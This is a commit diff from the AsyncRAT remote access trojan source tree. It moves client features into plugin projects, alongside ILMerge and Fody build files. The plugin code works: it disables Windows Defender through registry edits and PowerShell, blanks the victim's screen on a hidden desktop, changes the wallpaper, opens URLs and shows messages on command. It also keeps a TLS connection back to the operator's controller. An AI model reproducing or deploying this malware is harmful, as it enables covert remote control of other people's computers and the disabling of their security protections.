<Target Name="EnsureNuGetPackageBuildImports" BeforeTargets="PrepareForBuild">
<PropertyGroup>
<ErrorText>This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.</ErrorText>
</PropertyGroup>
<Error Condition="!Exists('..\..\..\packages\ILMerge.3.0.29\build\ILMerge.props')" Text="$([System.String]::Format('$(ErrorText)', '..\..\..\packages\ILMerge.3.0.29\build\ILMerge.props'))" />
<Error Condition="!Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props')" Text="$([System.String]::Format('$(ErrorText)', '..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props'))" />
<Error Condition="!Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets'))" />
</Target>
<Import Project="..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets" Condition="Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets')" />
</Project>

3
AsyncRAT-C#/Plugin/Extra/Extra/FodyWeavers.xml Normal file
View File

@ -0,0 +1,3 @@
<Weavers xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="FodyWeavers.xsd">
<Costura />
</Weavers>

111
AsyncRAT-C#/Plugin/Extra/Extra/FodyWeavers.xsd Normal file
View File

@ -0,0 +1,111 @@
<?xml version="1.0" encoding="utf-8"?>
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<!-- This file was generated by Fody. Manual changes to this file will be lost when your project is rebuilt. -->
<xs:element name="Weavers">
<xs:complexType>
<xs:all>
<xs:element name="Costura" minOccurs="0" maxOccurs="1">
<xs:complexType>
<xs:all>
<xs:element minOccurs="0" maxOccurs="1" name="ExcludeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="IncludeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="Unmanaged32Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged 32 bit assembly names to include, delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="Unmanaged64Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged 64 bit assembly names to include, delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="PreloadOrder" type="xs:string">
<xs:annotation>
<xs:documentation>The order of preloaded assemblies, delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
</xs:all>
<xs:attribute name="CreateTemporaryAssemblies" type="xs:boolean">
<xs:annotation>
<xs:documentation>This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="IncludeDebugSymbols" type="xs:boolean">
<xs:annotation>
<xs:documentation>Controls if .pdbs for reference assemblies are also embedded.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="DisableCompression" type="xs:boolean">
<xs:annotation>
<xs:documentation>Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="DisableCleanup" type="xs:boolean">
<xs:annotation>
<xs:documentation>As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="LoadAtModuleInit" type="xs:boolean">
<xs:annotation>
<xs:documentation>Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="IgnoreSatelliteAssemblies" type="xs:boolean">
<xs:annotation>
<xs:documentation>Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="ExcludeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with |</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="IncludeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="Unmanaged32Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged 32 bit assembly names to include, delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="Unmanaged64Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged 64 bit assembly names to include, delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="PreloadOrder" type="xs:string">
<xs:annotation>
<xs:documentation>The order of preloaded assemblies, delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
</xs:complexType>
</xs:element>
</xs:all>
<xs:attribute name="VerifyAssembly" type="xs:boolean">
<xs:annotation>
<xs:documentation>'true' to run assembly verification (PEVerify) on the target assembly after all weavers have been executed.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="VerifyIgnoreCodes" type="xs:string">
<xs:annotation>
<xs:documentation>A comma-separated list of error codes that can be safely ignored in assembly verification.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="GenerateXsd" type="xs:boolean">
<xs:annotation>
<xs:documentation>'false' to turn off automatic generation of the XML Schema file.</xs:documentation>
</xs:annotation>
</xs:attribute>
</xs:complexType>
</xs:element>
</xs:schema>

37
AsyncRAT-C#/Client/Handle Packet/HandleBlankScreen.cs → AsyncRAT-C#/Plugin/Extra/Extra/Handler/HandleBlankScreen.cs
View File

@ -1,12 +1,13 @@
using System;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
namespace Client.Handle_Packet
namespace Plugin.Handler
{
public static class HandleBlankScreen
public class HandleBlankScreen
{
[DllImport("user32.dll")]
public static extern IntPtr CreateDesktop(string lpszDesktop, IntPtr lpszDevice, IntPtr pDevmode, int dwFlags, uint dwDesiredAccess, IntPtr lpsa);
@ -44,29 +45,25 @@ namespace Client.Handle_Packet
}
// old desktop's handle, obtained by getting the current desktop assigned for this thread
static readonly IntPtr hOldDesktop = GetThreadDesktop(GetCurrentThreadId());
public readonly IntPtr hOldDesktop = GetThreadDesktop(GetCurrentThreadId());
// new desktop's handle, assigned automatically by CreateDesktop
static IntPtr hNewDesktop = CreateDesktop("RandomDesktopName", IntPtr.Zero, IntPtr.Zero, 0, (uint)DESKTOP_ACCESS.GENERIC_ALL, IntPtr.Zero);
public IntPtr hNewDesktop = CreateDesktop("RandomDesktopName", IntPtr.Zero, IntPtr.Zero, 0, (uint)DESKTOP_ACCESS.GENERIC_ALL, IntPtr.Zero);
public static bool switcher = false; //the screen is not blanked be default so this should be false
public static void RunBlankScreen()
public void Run()
{
try
{
//light switch logic CopyPasta by MrDevBot
if (switcher == false) //The current screen is NOT blanked and needs to be
{
SwitchDesktop(hNewDesktop);
switcher = true; //sets the switch to on for next click
return; //returns to calling function
}
else //the screen is blanked and should be switched back to old
{
SwitchDesktop(hOldDesktop);
switcher = false; //sets the switch to off for next click
return; //returns to calling function
}
SwitchDesktop(hNewDesktop);
}
catch { }
}
public void Stop()
{
try
{
SwitchDesktop(hOldDesktop);
}
catch { }
}

29
AsyncRAT-C#/Client/Handle Packet/HandleWindowsDefender.cs → AsyncRAT-C#/Plugin/Extra/Extra/Handler/HandleDisableDefender.cs
View File

@ -1,22 +1,19 @@
using System;
using Microsoft.Win32;
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Security.Principal;
using Client.Helper;
using System.Text;
// │ Author : NYAN CAT
// │ Name : Disable Windows Defender v1.0
// │ Contact : https://github.com/NYAN-x-CAT
// This program is distributed for educational purposes only.
namespace Client.Handle_Packet
namespace Plugin.Handler
{
public class HandleWindowsDefender
class HandleDisableDefender
{
public HandleWindowsDefender()
public void Run()
{
if (!Methods.IsAdmin()) return;
Debug.WriteLine("Plugin Invoked");
if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) return;
RegistryEdit(@"SOFTWARE\Microsoft\Windows Defender\Features", "TamperProtection", "0"); //Windows 10 1903 Redstone 6
RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender", "DisableAntiSpyware", "1");
@ -27,7 +24,7 @@ namespace Client.Handle_Packet
CheckDefender();
}
private static void RegistryEdit(string regPath, string name, string value)
private void RegistryEdit(string regPath, string name, string value)
{
try
{
@ -45,7 +42,7 @@ namespace Client.Handle_Packet
catch { }
}
private static void CheckDefender()
private void CheckDefender()
{
Process proc = new Process
{
@ -111,7 +108,7 @@ namespace Client.Handle_Packet
}
}
private static void RunPS(string args)
private void RunPS(string args)
{
Process proc = new Process
{

40
AsyncRAT-C#/Plugin/Extra/Extra/Handler/Wallpaper.cs Normal file
View File

@ -0,0 +1,40 @@
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Drawing;
using System.Drawing.Imaging;
using System.IO;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
namespace Plugin.Handler
{
public class Wallpaper
{
[DllImport("user32.dll")]
public static extern uint SystemParametersInfo(uint action, uint uParam, string vParam, uint winIni);
public static readonly uint SPI_SETDESKWALLPAPER = 0x14;
public static readonly uint SPIF_UPDATEINIFILE = 0x01;
public static readonly uint SPIF_SENDWININICHANGE = 0x02;
public void Change(byte[] img, string exe)
{
string path1 = Path.Combine(Path.GetTempFileName() + exe);
string path2 = Path.Combine(Path.GetTempFileName() + exe);
File.WriteAllBytes(path1, img);
using (Bitmap bmp = new Bitmap(path1))
using (Graphics graphics = Graphics.FromImage(bmp))
{
bmp.Save(path2, ImageFormat.Bmp);
}
using (RegistryKey key = Registry.CurrentUser.OpenSubKey(@"Control Panel\Desktop", true))
{
key.SetValue("WallpaperStyle", 2.ToString());
key.SetValue("TileWallpaper", 0.ToString());
}
SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, path2, SPIF_UPDATEINIFILE | SPIF_SENDWININICHANGE);
}
}
}

67
AsyncRAT-C#/Plugin/Extra/Extra/ILMerge.props Normal file
View File

@ -0,0 +1,67 @@
<?xml version="1.0" encoding="utf-8" ?>
<Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<!-- -->
<!-- ILMerge project-specific settings. Almost never need to be set explicitly. -->
<!-- for details, see http://research.microsoft.com/en-us/people/mbarnett/ilmerge.aspx -->
<!-- -->
<!-- *** set this file to Type=None, CopyToOutput=Never *** -->
<!-- If True, all copy local dependencies will also be merged from referenced projects whether they are referenced in the current project explicitly or not -->
<ILMergeTransitive>true</ILMergeTransitive>
<!-- Extra ILMerge library paths (semicolon-separated). Dont put your package dependencies here, they will be added automagically -->
<ILMergeLibraryPath></ILMergeLibraryPath>
<!-- The solution NuGet package directory if not standard 'SOLUTION\packages' -->
<ILMergePackagesPath></ILMergePackagesPath>
<!-- The merge order file name if differs from standard 'ILMergeOrder.txt' -->
<ILMergeOrderFile></ILMergeOrderFile>
<!-- The strong key file name if not specified in the project -->
<ILMergeKeyFile></ILMergeKeyFile>
<!-- The assembly version if differs for the version of the main assembly -->
<ILMergeAssemblyVersion></ILMergeAssemblyVersion>
<!-- added in Version 1.0.4 -->
<ILMergeFileAlignment></ILMergeFileAlignment>
<!-- added in Version 1.0.4, default=none -->
<ILMergeAllowDuplicateType></ILMergeAllowDuplicateType>
<!-- If the <see cref="CopyAttributes"/> is also set, any assembly-level attributes names that have the same type are copied over into the target assembly -->
<ILMergeAllowMultipleAssemblyLevelAttributes></ILMergeAllowMultipleAssemblyLevelAttributes>
<!-- See ILMerge documentation -->
<ILMergeAllowZeroPeKind></ILMergeAllowZeroPeKind>
<!-- The assembly level attributes of each input assembly are copied over into the target assembly -->
<ILMergeCopyAttributes></ILMergeCopyAttributes>
<!-- Creates a .pdb file for the output assembly and merges into it any .pdb files found for input assemblies, default=true -->
<ILMergeDebugInfo>false</ILMergeDebugInfo>
<!-- Target assembly will be delay signed -->
<ILMergeDelaySign></ILMergeDelaySign>
<!-- Types in assemblies other than the primary assembly have their visibility modified -->
<ILMergeInternalize></ILMergeInternalize>
<!-- The path name of the file that will be used to identify types that are not to have their visibility modified -->
<ILMergeInternalizeExcludeFile></ILMergeInternalizeExcludeFile>
<!-- XML documentation files are merged to produce an XML documentation file for the target assembly -->
<ILMergeXmlDocumentation></ILMergeXmlDocumentation>
<!-- External assembly references in the manifest of the target assembly will use full public keys (false) or public key tokens (true, default value) -->
<ILMergePublicKeyTokens></ILMergePublicKeyTokens>
<!-- Types with the same name are all merged into a single type in the target assembly -->
<ILMergeUnionMerge></ILMergeUnionMerge>
<!-- The version of the target framework, default 40 (works for 45 too) -->
<ILTargetPlatform></ILTargetPlatform>
</PropertyGroup>
</Project>

4
AsyncRAT-C#/Plugin/Extra/Extra/ILMergeOrder.txt Normal file
View File

@ -0,0 +1,4 @@
# this file contains the partial list of the merged assemblies in the merge order
# you can fill it from the obj\CONFIG\PROJECT.ilmerge generated on every build
# and finetune merge order to your satisfaction

86
AsyncRAT-C#/Plugin/Extra/Extra/Packet.cs Normal file
View File

@ -0,0 +1,86 @@
using Plugin.Handler;
using MessagePackLib.MessagePack;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Linq;
using System.Management;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
using System.Windows.Forms;
namespace Plugin
{
public static class Packet
{
public static void Read(object data)
{
try
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
case "wallpaper":
{
new Wallpaper().Change(unpack_msgpack.ForcePathObject("Image").GetAsBytes(), unpack_msgpack.ForcePathObject("Exe").AsString);
break;
}
case "visitURL":
{
string url = unpack_msgpack.ForcePathObject("URL").AsString;
if (!url.StartsWith("http"))
{
url = "http://" + url;
}
Process.Start(url);
break;
}
case "sendMessage":
{
MessageBox.Show(unpack_msgpack.ForcePathObject("Message").AsString);
break;
}
case "disableDefedner":
{
new HandleDisableDefender().Run();
break;
}
case "blankscreen+":
{
new HandleBlankScreen().Run();
break;
}
case "blankscreen-":
{
new HandleBlankScreen().Stop();
break;
}
}
}
catch (Exception ex)
{
Error(ex.Message);
}
Connection.Disconnected();
}
public static void Error(string ex)
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "Error";
msgpack.ForcePathObject("Error").AsString = ex;
Connection.Send(msgpack.Encode2Bytes());
}
}
}

28
AsyncRAT-C#/Plugin/Extra/Extra/Plugin.cs Normal file
View File

@ -0,0 +1,28 @@
using System.Diagnostics;
using System.Net.Sockets;
using System.Security.Cryptography.X509Certificates;
using System.Threading;
namespace Plugin
{
public class Plugin
{
public static Socket Socket;
public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
{
Debug.WriteLine("Plugin Invoked");
Socket = socket;
Connection.ServerCertificate = certificate;
Connection.Hwid = hwid;
new Thread(() =>
{
Connection.InitializeClient(msgPack);
}).Start();
while (Connection.IsConnected)
{
Thread.Sleep(1000);
}
}
}
}

36
AsyncRAT-C#/Plugin/Extra/Extra/Properties/AssemblyInfo.cs Normal file
View File

@ -0,0 +1,36 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("")]
[assembly: AssemblyCopyright("")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
//[assembly: Guid("424b81be-2fac-419f-b4bc-00ccbe38491f")]
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]

5
AsyncRAT-C#/Plugin/Extra/Extra/packages.config Normal file
View File

@ -0,0 +1,5 @@
<?xml version="1.0" encoding="utf-8"?>
<packages>
<package id="ILMerge" version="3.0.29" targetFramework="net40" />
<package id="MSBuild.ILMerge.Task" version="1.1.3" targetFramework="net40" />
</packages>

25
AsyncRAT-C#/Plugin/FileManager/FileManager.sln Normal file
View File

@ -0,0 +1,25 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.29123.88
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "FileManager", "FileManager\FileManager.csproj", "{BEE88186-769A-452C-9DD9-D0E0815D92BF}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{BEE88186-769A-452C-9DD9-D0E0815D92BF}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{BEE88186-769A-452C-9DD9-D0E0815D92BF}.Debug|Any CPU.Build.0 = Debug|Any CPU
{BEE88186-769A-452C-9DD9-D0E0815D92BF}.Release|Any CPU.ActiveCfg = Release|Any CPU
{BEE88186-769A-452C-9DD9-D0E0815D92BF}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {4FD410CC-1F1D-4948-A108-13285D633CDD}
EndGlobalSection
EndGlobal

228
AsyncRAT-C#/Plugin/FileManager/FileManager/Connection.cs Normal file
View File

@ -0,0 +1,228 @@
using Plugin.Handler;
using MessagePackLib.MessagePack;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Net.Security;
using System.Net.Sockets;
using System.Security.Authentication;
using System.Security.Cryptography.X509Certificates;
using System.Text;
using System.Threading;
namespace Plugin
{
public static class Connection
{
public static Socket TcpClient { get; set; }
public static SslStream SslClient { get; set; }
public static X509Certificate2 ServerCertificate { get; set; }
private static byte[] Buffer { get; set; }
private static long HeaderSize { get; set; }
private static long Offset { get; set; }
private static Timer Tick { get; set; }
public static bool IsConnected { get; set; }
private static object SendSync { get; } = new object();
public static string Hwid { get; set; }
public static void InitializeClient(byte[] packet)
{
try
{
TcpClient = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
{
ReceiveBufferSize = 50 * 1024,
SendBufferSize = 50 * 1024,
};
TcpClient.Connect(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[0], Convert.ToInt32(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[1]));
if (TcpClient.Connected)
{
Debug.WriteLine("Plugin Connected!");
IsConnected = true;
SslClient = new SslStream(new NetworkStream(TcpClient, true), false, ValidateServerCertificate);
SslClient.AuthenticateAsClient(TcpClient.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false);
HeaderSize = 4;
Buffer = new byte[HeaderSize];
Offset = 0;
Tick = new Timer(new TimerCallback(CheckServer), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 30 * 1000));
SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
new Thread(() =>
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "fileManager";
msgpack.ForcePathObject("Hwid").AsString = Hwid;
msgpack.ForcePathObject("Command").AsString = "setClient";
Send(msgpack.Encode2Bytes());
new FileManager(new MsgPack()).GetDrivers();
}).Start();
}
else
{
IsConnected = false;
return;
}
}
catch
{
Debug.WriteLine("Disconnected!");
IsConnected = false;
return;
}
}
private static bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors)
{
#if DEBUG
return true;
#endif
return ServerCertificate.Equals(certificate);
}
public static void Disconnected()
{
try
{
IsConnected = false;
Tick?.Dispose();
SslClient?.Dispose();
TcpClient?.Dispose();
GC.Collect();
}
catch { }
}
public static void ReadServertData(IAsyncResult ar) //Socket read/recevie
{
try
{
if (!TcpClient.Connected || !IsConnected)
{
IsConnected = false;
return;
}
int recevied = SslClient.EndRead(ar);
if (recevied > 0)
{
Offset += recevied;
HeaderSize -= recevied;
if (HeaderSize == 0)
{
HeaderSize = BitConverter.ToInt32(Buffer, 0);
Debug.WriteLine("/// Plugin Buffersize " + HeaderSize.ToString() + " Bytes ///");
if (HeaderSize > 0)
{
Offset = 0;
Buffer = new byte[HeaderSize];
while (HeaderSize > 0)
{
int rc = SslClient.Read(Buffer, (int)Offset, (int)HeaderSize);
if (rc <= 0)
{
IsConnected = false;
return;
}
Offset += rc;
HeaderSize -= rc;
if (HeaderSize < 0)
{
IsConnected = false;
return;
}
}
Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read));
thread.Start(Buffer);
Offset = 0;
HeaderSize = 4;
Buffer = new byte[HeaderSize];
}
else
{
HeaderSize = 4;
Buffer = new byte[HeaderSize];
Offset = 0;
}
}
else if (HeaderSize < 0)
{
IsConnected = false;
return;
}
SslClient.BeginRead(Buffer, (int)Offset, (int)HeaderSize, ReadServertData, null);
}
else
{
IsConnected = false;
return;
}
}
catch
{
IsConnected = false;
return;
}
}
public static void Send(byte[] msg)
{
lock (SendSync)
{
try
{
if (!IsConnected || msg == null)
{
return;
}
byte[] buffersize = BitConverter.GetBytes(msg.Length);
TcpClient.Poll(-1, SelectMode.SelectWrite);
SslClient.Write(buffersize, 0, buffersize.Length);
if (msg.Length > 1000000) //1mb
{
Debug.WriteLine("send chunks");
using (MemoryStream memoryStream = new MemoryStream(msg))
{
int read = 0;
memoryStream.Position = 0;
byte[] chunk = new byte[50 * 1000];
while ((read = memoryStream.Read(chunk, 0, chunk.Length)) > 0)
{
TcpClient.Poll(-1, SelectMode.SelectWrite);
SslClient.Write(chunk, 0, read);
SslClient.Flush();
}
}
}
else
{
TcpClient.Poll(-1, SelectMode.SelectWrite);
SslClient.Write(msg, 0, msg.Length);
SslClient.Flush();
}
Debug.WriteLine("Plugin Packet Sent");
}
catch
{
IsConnected = false;
return;
}
}
}
public static void CheckServer(object obj)
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "Ping!)";
Send(msgpack.Encode2Bytes());
GC.Collect();
}
}
}

78
AsyncRAT-C#/Plugin/FileManager/FileManager/FileManager.csproj Normal file
View File

@ -0,0 +1,78 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props" Condition="Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props')" />
<Import Project="..\..\..\packages\ILMerge.3.0.29\build\ILMerge.props" Condition="Exists('..\..\..\packages\ILMerge.3.0.29\build\ILMerge.props')" />
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{BEE88186-769A-452C-9DD9-D0E0815D92BF}</ProjectGuid>
<OutputType>Library</OutputType>
<AppDesignerFolder>Properties</AppDesignerFolder>
<RootNamespace>Plugin</RootNamespace>
<AssemblyName>FileManager</AssemblyName>
<TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<Deterministic>true</Deterministic>
<NuGetPackageImportStamp>
</NuGetPackageImportStamp>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>..\..\..\Binaries\Debug\Plugins\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<DebugType>none</DebugType>
<Optimize>true</Optimize>
<OutputPath>..\..\..\Binaries\Release\Plugins\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Drawing" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" />
<Reference Include="System.Data" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Connection.cs" />
<Compile Include="Handler\FileManager.cs" />
<Compile Include="Packet.cs" />
<Compile Include="Plugin.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
<Compile Include="TempSocket.cs" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\..\..\MessagePack\MessagePackLib.csproj">
<Project>{DC199D9E-CF10-41DD-BBCD-98E71BA8679D}</Project>
<Name>MessagePackLib</Name>
</ProjectReference>
</ItemGroup>
<ItemGroup>
<None Include="ILMerge.props" />
<None Include="packages.config" />
</ItemGroup>
<ItemGroup>
<Content Include="ILMergeOrder.txt" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
<Target Name="EnsureNuGetPackageBuildImports" BeforeTargets="PrepareForBuild">
<PropertyGroup>
<ErrorText>This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.</ErrorText>
</PropertyGroup>
<Error Condition="!Exists('..\..\..\packages\ILMerge.3.0.29\build\ILMerge.props')" Text="$([System.String]::Format('$(ErrorText)', '..\..\..\packages\ILMerge.3.0.29\build\ILMerge.props'))" />
<Error Condition="!Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props')" Text="$([System.String]::Format('$(ErrorText)', '..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props'))" />
<Error Condition="!Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets'))" />
</Target>
<Import Project="..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets" Condition="Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets')" />
</Project>

3
AsyncRAT-C#/Plugin/FileManager/FileManager/FodyWeavers.xml Normal file
View File

@ -0,0 +1,3 @@
<Weavers xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="FodyWeavers.xsd">
<Costura />
</Weavers>

111
AsyncRAT-C#/Plugin/FileManager/FileManager/FodyWeavers.xsd Normal file
View File

@ -0,0 +1,111 @@
<?xml version="1.0" encoding="utf-8"?>
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<!-- This file was generated by Fody. Manual changes to this file will be lost when your project is rebuilt. -->
<xs:element name="Weavers">
<xs:complexType>
<xs:all>
<xs:element name="Costura" minOccurs="0" maxOccurs="1">
<xs:complexType>
<xs:all>
<xs:element minOccurs="0" maxOccurs="1" name="ExcludeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="IncludeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="Unmanaged32Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged 32 bit assembly names to include, delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
